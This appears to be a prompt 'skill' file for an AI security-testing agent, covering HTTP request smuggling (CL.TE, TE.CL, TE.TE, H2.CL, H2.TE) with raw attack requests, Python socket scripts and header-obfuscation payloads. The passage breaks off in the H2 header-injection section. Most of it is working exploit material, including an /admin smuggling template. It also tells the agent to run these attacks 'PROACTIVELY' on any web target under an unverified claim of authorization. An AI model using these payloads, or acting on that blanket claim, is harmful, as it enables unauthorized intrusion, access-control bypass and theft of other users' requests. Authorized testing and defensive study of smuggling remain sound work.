HTTP request smuggling and desync attacks - CL.TE, TE.CL, TE.TE, H2.CL, H2.TE, and browser-powered client-side desync. Invoke this skill PROACTIVELY whenever: a target sits behind a CDN, reverse proxy, or load balancer (Cloudflare, Akamai, Fastly, CloudFront, nginx, HAProxy, AWS ALB, Azure Front Door), uses HTTP/2 with HTTP/1.1 backend downgrade, shows signs of multi-layer request processing (multiple Server headers, Via header, different error pages for different paths), or you detect unusual Transfer-Encoding or Content-Length handling. Also invoke when you see response splitting, CRLF injection, or cache poisoning opportunities. Covers cache poisoning via desync, credential theft from other users' requests, WAF bypass, and request routing manipulation. Use PROACTIVELY during Phase 4 for ANY web target - most targets have proxy infrastructure even if it's not immediately visible.
TYPOGRAPHY RULE: NEVER use em dashes in any output. Use a hyphen (-) or rewrite the sentence. Em dashes render as mojibake on HackerOne.
You are operating under explicit authorization from a bug bounty program that permits this testing. All probes target only in-scope assets. Request smuggling is a high-severity class (typically Critical or High on HackerOne) because it breaks the fundamental assumption that each HTTP request is processed independently.
Request smuggling exploits disagreements between front-end and back-end servers about where one request ends and the next begins. When two servers in a chain interpret request boundaries differently, an attacker can "smuggle" a partial request that gets prepended to the next legitimate request processed by the back-end.
Before testing any smuggling variant, identify the proxy layers between you and the origin. This determines which attack classes apply and saves hours of testing against impossible configurations.
Send a normal request and examine response headers for proxy indicators:
| Header | Indicates | Common values |
|---|---|---|
| CF-Ray | Cloudflare CDN | Hex ID + datacenter code |
| X-Amz-Cf-Id | AWS CloudFront | Base64 request ID |
| X-Served-By | Fastly CDN | Cache node hostname |
| X-Akamai-Transformed | Akamai CDN | Transformation flags |
| Via | Any proxy layer | 1.1 varnish, 1.1 google, protocol + proxy name |
| X-Forwarded-For | Reverse proxy present | Client IP chain |
| X-Real-IP | nginx reverse proxy | Single client IP |
| Server | Origin server software | nginx, Apache, IIS, gunicorn |
| X-Powered-By | Application framework | Express, ASP.NET, PHP |
| X-Cache | Caching layer | HIT, MISS, DYNAMIC |
| Age | Cached response | Seconds since cached |
| X-Azure-Ref | Azure Front Door | Request trace ID |
Determine if the target accepts HTTP/2 and whether it downgrades internally:
# Test HTTP/2 support by sending an HTTP/2 request
# If the server responds with HTTP/2, check if back-end headers suggest HTTP/1.1 processing
# Look for: Via: 1.1 ..., or HTTP/1.1-style chunked encoding in responses
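A quick way to check the first signal is ALPN negotiation during the TLS handshake. This is a stdlib-only sketch; `target.com` is a placeholder for the in-scope host.

```python
import socket
import ssl

def negotiated_protocol(host: str, port: int = 443, timeout: float = 5.0) -> str:
    """Return the ALPN protocol the edge selects ("h2" means HTTP/2)."""
    ctx = ssl.create_default_context()
    # Offer both protocols and let the front-end pick.
    ctx.set_alpn_protocols(["h2", "http/1.1"])
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return tls.selected_alpn_protocol() or "http/1.1"

# Example: negotiated_protocol("target.com") returning "h2" means the edge
# accepts HTTP/2; pair that with a Via: 1.1 response header to infer downgrade.
```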
Key signals of HTTP/2 to HTTP/1.1 downgrade:
- Via header showing 1.1
- Transfer-Encoding: chunked in responses (HTTP/2 does not use chunked encoding)

Send requests that trigger different error handlers to reveal layers:
# Request 1: Invalid HTTP method (triggers front-end error)
XYZZY / HTTP/1.1
Host: target.com
# Request 2: Valid request to non-existent deep path (triggers back-end 404)
GET /asdkjhqwkejhqwkejh/asdjkh HTTP/1.1
Host: target.com
# Request 3: Oversized header (triggers whichever layer enforces limits first)
GET / HTTP/1.1
Host: target.com
X-Long: AAAA...(8192+ bytes)...AAAA
Compare error page formats. Different HTML, different status codes, or different Server headers confirm multiple layers.
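The three probes above can be built as raw bytes for replay over a plain socket, which makes diffing the responses easy. A minimal sketch; `target.com` is a placeholder.

```python
def layer_probes(host: str) -> list[bytes]:
    """Build the three layer-probing requests as raw HTTP/1.1 bytes."""
    # Probe 1: invalid method, usually rejected by the front-end.
    invalid_method = f"XYZZY / HTTP/1.1\r\nHost: {host}\r\n\r\n"
    # Probe 2: valid request for a deep non-existent path, 404s at the back-end.
    deep_404 = f"GET /asdkjhqwkejhqwkejh/asdjkh HTTP/1.1\r\nHost: {host}\r\n\r\n"
    # Probe 3: oversized header, rejected by whichever layer enforces limits first.
    big_header = f"GET / HTTP/1.1\r\nHost: {host}\r\nX-Long: {'A' * 8192}\r\n\r\n"
    return [p.encode() for p in (invalid_method, deep_404, big_header)]
```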
| Front-end | Back-end | Smuggling risk | Most likely variant |
|---|---|---|---|
| Cloudflare | nginx/Apache | Medium | TE.TE (CF normalizes CL/TE well, but TE obfuscation can slip through) |
| CloudFront | ALB + app | High | CL.TE, H2.CL (ALB has had known smuggling issues) |
| Akamai | Apache/IIS | Medium | TE.TE, CL.TE |
| Fastly (Varnish) | nginx | High | CL.TE (Varnish historically vulnerable to CL.TE) |
| nginx | gunicorn/uWSGI | High | CL.TE, TE.CL (Python servers parse TE differently) |
| HAProxy | nginx | Medium | TE.TE |
| AWS ALB | ECS/EC2 app | High | H2.CL (ALB does HTTP/2 to HTTP/1.1 downgrade) |
| Azure Front Door | App Service | Medium | H2.CL, TE.TE |
| Load balancer (generic) | Any | Test all | Unknown config means test everything |
The front-end uses Content-Length to determine request boundaries. The back-end uses Transfer-Encoding: chunked. When both headers are present, they disagree on where the body ends.
This probe has zero side effects on other users. It only affects the connection you control.
POST / HTTP/1.1
Host: target.com
Content-Length: 6
Transfer-Encoding: chunked

0

X
Byte breakdown:
- 0\r\n = 3 bytes (chunk terminator)
- \r\n = 2 bytes (end of chunked body)
- X = 1 byte (smuggled prefix)

Interpreting the response:
- If the back-end uses Transfer-Encoding, it saw the 0\r\n\r\n chunk terminator and responded immediately. The X byte is left in the buffer. This confirms CL.TE - the front-end forwarded 6 bytes (using CL), but the back-end only consumed 5 (using TE).
- If the back-end uses Content-Length, it expected 6 bytes, received them all, and responded normally. No smuggling is possible with this variant.

Send two requests on the same connection to confirm the smuggled prefix affects the second request:
POST / HTTP/1.1
Host: target.com
Content-Length: 44
Transfer-Encoding: chunked

0

GET /404-confirm-smuggle HTTP/1.1
X: x
What happens if CL.TE is present:
- The front-end obeys Content-Length and forwards the full declared body
- The back-end obeys Transfer-Encoding: chunked, processes 0\r\n\r\n as an empty chunked body, and responds to the POST
- The remaining bytes (GET /404-confirm-smuggle HTTP/1.1\r\nX: x) stay in the back-end buffer

Now send a normal follow-up request on the same connection:
GET / HTTP/1.1
Host: target.com
If the response is a 404 for /404-confirm-smuggle instead of the homepage, smuggling is confirmed.
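The two-request confirmation can be sketched over a raw TLS socket. This is a minimal sketch, not a hardened tool: the hostname is a placeholder, the Content-Length is computed from the body rather than hand-counted, and real front-ends may close or re-pool connections in ways this does not handle.

```python
import socket
import ssl

HOST = "target.com"  # placeholder - substitute the in-scope target
PREFIX = b"GET /404-confirm-smuggle HTTP/1.1\r\nX: x"
BODY = b"0\r\n\r\n" + PREFIX  # empty chunked body, then the smuggled prefix

attack = (
    b"POST / HTTP/1.1\r\n"
    b"Host: " + HOST.encode() + b"\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n" + BODY
)
follow_up = b"GET / HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\n\r\n"

def run() -> bytes:
    ctx = ssl.create_default_context()
    with socket.create_connection((HOST, 443), timeout=10) as s:
        with ctx.wrap_socket(s, server_hostname=HOST) as tls:
            tls.sendall(attack)
            tls.recv(4096)         # response to the POST
            tls.sendall(follow_up)
            return tls.recv(4096)  # a 404 here, on a request for /, is the proof
```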
To generate safe proof without affecting other users, smuggle a request that redirects to a unique canary URL you control:
POST / HTTP/1.1
Host: target.com
Content-Length: 86
Transfer-Encoding: chunked

0

GET /nonexistent-path-unique-canary-12345 HTTP/1.1
Host: target.com
X-Ignore: x
Then immediately send a normal GET / on the same connection. If you receive a 404 for your canary path, document that as the proof. The self-smuggle demonstrates the desync without any risk to other users.
Getting the Content-Length right is critical. Count every byte after the blank line that ends the headers:
0\r\n = 3 bytes
\r\n = 2 bytes
GET /path HTTP/1.1\r\n = (length of this line + 2)
Host: target.com\r\n = (length + 2)
X-Ignore: x = (length, no trailing CRLF needed if it's the last line)
Sum all bytes. Set Content-Length to that total.
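The arithmetic above is easy to get wrong by hand; a short helper (an assumption of this guide, not a standard tool) computes it directly.

```python
def chunked_body_with_prefix(prefix_lines: list[str]) -> bytes:
    """Empty chunked body (0\r\n\r\n) followed by the smuggled prefix.

    Lines are joined with CRLF; the last line gets no trailing CRLF,
    matching the counting rules above.
    """
    prefix = "\r\n".join(prefix_lines).encode()
    return b"0\r\n\r\n" + prefix

body = chunked_body_with_prefix([
    "GET /404-confirm-smuggle HTTP/1.1",
    "X: x",
])
print(len(body))  # -> 44; this value goes in the Content-Length header
```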
The front-end uses Transfer-Encoding: chunked. The back-end uses Content-Length. This is the reverse of CL.TE.
POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
Interpreting the response:
If the front-end uses Transfer-Encoding, it processed the chunked body correctly and forwarded it in full. The back-end then used Content-Length: 4, read only 5c\r\n (4 bytes), and left the rest in the buffer. This confirms TE.CL.

A minimal timing probe to detect TE.CL:
POST / HTTP/1.1
Host: target.com
Content-Length: 6
Transfer-Encoding: chunked

0

X

This is the same request shape as the CL.TE probe - the distinguishing signal here is timing. If the front-end uses TE, it forwards only the terminated chunked body (0\r\n\r\n, 5 bytes). The back-end uses CL, expects 6 bytes, and waits for the missing byte - an observable delay confirms TE.CL. If the front-end uses CL instead, all 6 bytes arrive and the back-end responds without delay.
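Chunk sizes are hexadecimal byte counts, so compute them rather than eyeballing. The example payload below is the GPOST request from the TE.CL probe above.

```python
def chunk_size_hex(chunk_data: bytes) -> str:
    """Hex chunk-size line for a given chunk payload."""
    return format(len(chunk_data), "x")

# Chunk data: everything between the size line and the closing CRLF.
chunk = (
    b"GPOST / HTTP/1.1\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 15\r\n"
    b"\r\n"
    b"x=1"
)
print(chunk_size_hex(chunk))  # -> 5c (92 bytes)
```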
In CL.TE, the smuggled content is whatever the front-end sends beyond what the back-end's chunked parser consumes. In TE.CL, the smuggled content is whatever the front-end sends beyond what the back-end's Content-Length consumes. This means:
- In CL.TE, the smuggled prefix goes after the 0\r\n\r\n chunk terminator
- In TE.CL, the smuggled prefix goes inside a chunk, beyond the Content-Length boundary

POST / HTTP/1.1
Host: target.com
Content-Length: 4
Transfer-Encoding: chunked

71
GET /admin HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

x=
0

The front-end processes the chunked body (chunk size 71 hex = 113 bytes of data, then the 0 terminator). The back-end reads only 4 bytes via Content-Length (71\r\n), leaving the GET /admin prefix in its buffer for the next request.
Both the front-end and back-end support Transfer-Encoding: chunked, but they parse malformed or obfuscated Transfer-Encoding headers differently. If you can make one layer accept the header and the other reject it (falling back to Content-Length), you reduce TE.TE to either CL.TE or TE.CL.
Test each variant and observe whether the server processes chunked encoding or falls back to Content-Length:
# Variant 1: Misspelled value
Transfer-Encoding: xchunked
# Variant 2: Space before colon
Transfer-Encoding : chunked
# Variant 3: Duplicate header with different case
Transfer-Encoding: chunked
Transfer-encoding: x
# Variant 4: Tab instead of space
Transfer-Encoding:\tchunked
# Variant 5: Trailing garbage after value
Transfer-Encoding: chunked, cow
# Variant 6: Value with null byte
Transfer-Encoding: chunked\x00
# Variant 7: CRLF prefix trick
Foo: bar\r\nTransfer-Encoding: chunked
# Variant 8: Vertical tab or form feed in value
Transfer-Encoding: \x0bchunked
Transfer-Encoding: \x0cchunked
# Variant 9: Line wrapping (obs-fold)
Transfer-Encoding:
chunked
# Variant 10: Multiple TE headers
Transfer-Encoding: chunked
Transfer-Encoding: identity
# Variant 11: Quoted value
Transfer-Encoding: "chunked"
# Variant 12: Mixed case value
Transfer-Encoding: Chunked
Transfer-Encoding: CHUNKED
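Several of these variants need byte-level control (\x00, \x0b, \x0c, obs-fold), so they must be built as raw bytes rather than through an HTTP library that normalizes headers. A sketch that materializes the list for replay:

```python
def te_obfuscations() -> list[bytes]:
    """Raw header lines for the Transfer-Encoding obfuscation variants."""
    return [
        b"Transfer-Encoding: xchunked",                             # misspelled value
        b"Transfer-Encoding : chunked",                             # space before colon
        b"Transfer-Encoding: chunked\r\nTransfer-encoding: x",      # duplicate, case varied
        b"Transfer-Encoding:\tchunked",                             # tab separator
        b"Transfer-Encoding: chunked, cow",                         # trailing garbage
        b"Transfer-Encoding: chunked\x00",                          # null byte
        b"Foo: bar\r\nTransfer-Encoding: chunked",                  # CRLF prefix trick
        b"Transfer-Encoding: \x0bchunked",                          # vertical tab
        b"Transfer-Encoding: \x0cchunked",                          # form feed
        b"Transfer-Encoding:\r\n chunked",                          # obs-fold line wrap
        b"Transfer-Encoding: chunked\r\nTransfer-Encoding: identity",  # multiple TE headers
        b'Transfer-Encoding: "chunked"',                            # quoted value
        b"Transfer-Encoding: Chunked",                              # mixed case
        b"Transfer-Encoding: CHUNKED",                              # upper case
    ]
```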
For each obfuscation variant, rerun the CL.TE and TE.CL probes from Attack Classes 1 and 2 and record whether each layer honored the obfuscated Transfer-Encoding header. Build a matrix:
| Variant | Front-end accepts TE? | Back-end accepts TE? | Exploitable? |
|---|---|---|---|
| chunked, cow | Yes | No | CL.TE |
| Chunked | No | Yes | TE.CL |
| ... | ... | ... | ... |
Any row where the two columns differ is exploitable. Use the corresponding CL.TE or TE.CL exploitation template from Attack Class 1 or 2.
When the front-end speaks HTTP/2 to the client but converts to HTTP/1.1 when talking to the back-end, header injection and protocol mismatches create smuggling opportunities. HTTP/2 is binary-framed (no chunked encoding, no Content-Length ambiguity between frames), but the downgrade process can reintroduce HTTP/1.1 parsing bugs.
In HTTP/2, the body length is determined by the DATA frame. But if the proxy passes a Content-Length header through to the HTTP/1.1 back-end, and that header disagrees with the actual body length, desync occurs.
Detection:
Send an HTTP/2 request with a Content-Length header that is shorter than the actual body:
:method: POST
:path: /
:authority: target.com
content-length: 0

GET /smuggled-h2cl-canary HTTP/1.1
Host: target.com
The HTTP/2 front-end processes the full DATA frame (including the smuggled GET). When it downgrades to HTTP/1.1, it passes Content-Length: 0 to the back-end. The back-end sees an empty POST body, responds, and the GET /smuggled-h2cl-canary remains in the buffer.
Proof: Send a follow-up request on the same HTTP/2 connection. If the response corresponds to /smuggled-h2cl-canary instead of your actual request, H2.CL is confirmed.
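The desync arithmetic can be illustrated with a toy model of a downgrading proxy that trusts the client-supplied content-length. This is purely illustrative - it models the byte accounting, not a real proxy implementation.

```python
def downgrade_split(claimed_cl: int, data_frame: bytes) -> tuple[bytes, bytes]:
    """Model an H2 -> HTTP/1.1 downgrade that forwards the client's CL.

    Returns (what the back-end reads as the POST body,
             what is orphaned in the buffer as the smuggled prefix).
    """
    consumed = data_frame[:claimed_cl]
    leftover = data_frame[claimed_cl:]
    return consumed, leftover

# The HTTP/2 DATA frame carries the smuggled request; claimed CL is 0.
frame = b"GET /smuggled-h2cl-canary HTTP/1.1\r\nHost: target.com\r\n\r\n"
body, smuggled = downgrade_split(0, frame)
# body is empty; the entire smuggled GET waits in the back-end buffer.
```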
HTTP/2 forbids Transfer-Encoding headers, but some proxies do not strip them during downgrade.
:method: POST
:path: /
:authority: target.com
transfer-encoding: chunked

0
GET /smuggled-h2te-canary HTTP/1.1
Host: target.com
X: x
If the proxy passes Transfer-Encoding: chunked through to the HTTP/1.1 back-end, the back-end processes 0\r\n\r\n as the chunked body terminator and leaves the smuggled GET in the buffer.
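A companion toy model for H2.TE, again illustrative only: if the smuggled transfer-encoding header survives the downgrade, the back-end's chunked parser stops at the first empty-body terminator and orphans everything after it.

```python
def chunked_consume(data: bytes) -> tuple[bytes, bytes]:
    """Model a back-end chunked parser fed an empty chunked body.

    Consumes up to and including the 0\r\n\r\n terminator; the remainder
    is what sits in the buffer waiting for the next request.
    """
    end = data.index(b"0\r\n\r\n") + 5
    return data[:end], data[end:]

frame = (
    b"0\r\n\r\n"
    b"GET /smuggled-h2te-canary HTTP/1.1\r\nHost: target.com\r\nX: x"
)
consumed, smuggled = chunked_consume(frame)
# consumed is just the terminator; the smuggled GET is left behind.
```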
HTTP/2 header values are binary and can contain bytes that would be illegal in HTTP/1.1. If the proxy does not sanitize header values during downgrade:
:method: GET
:path: /
:authority: target.com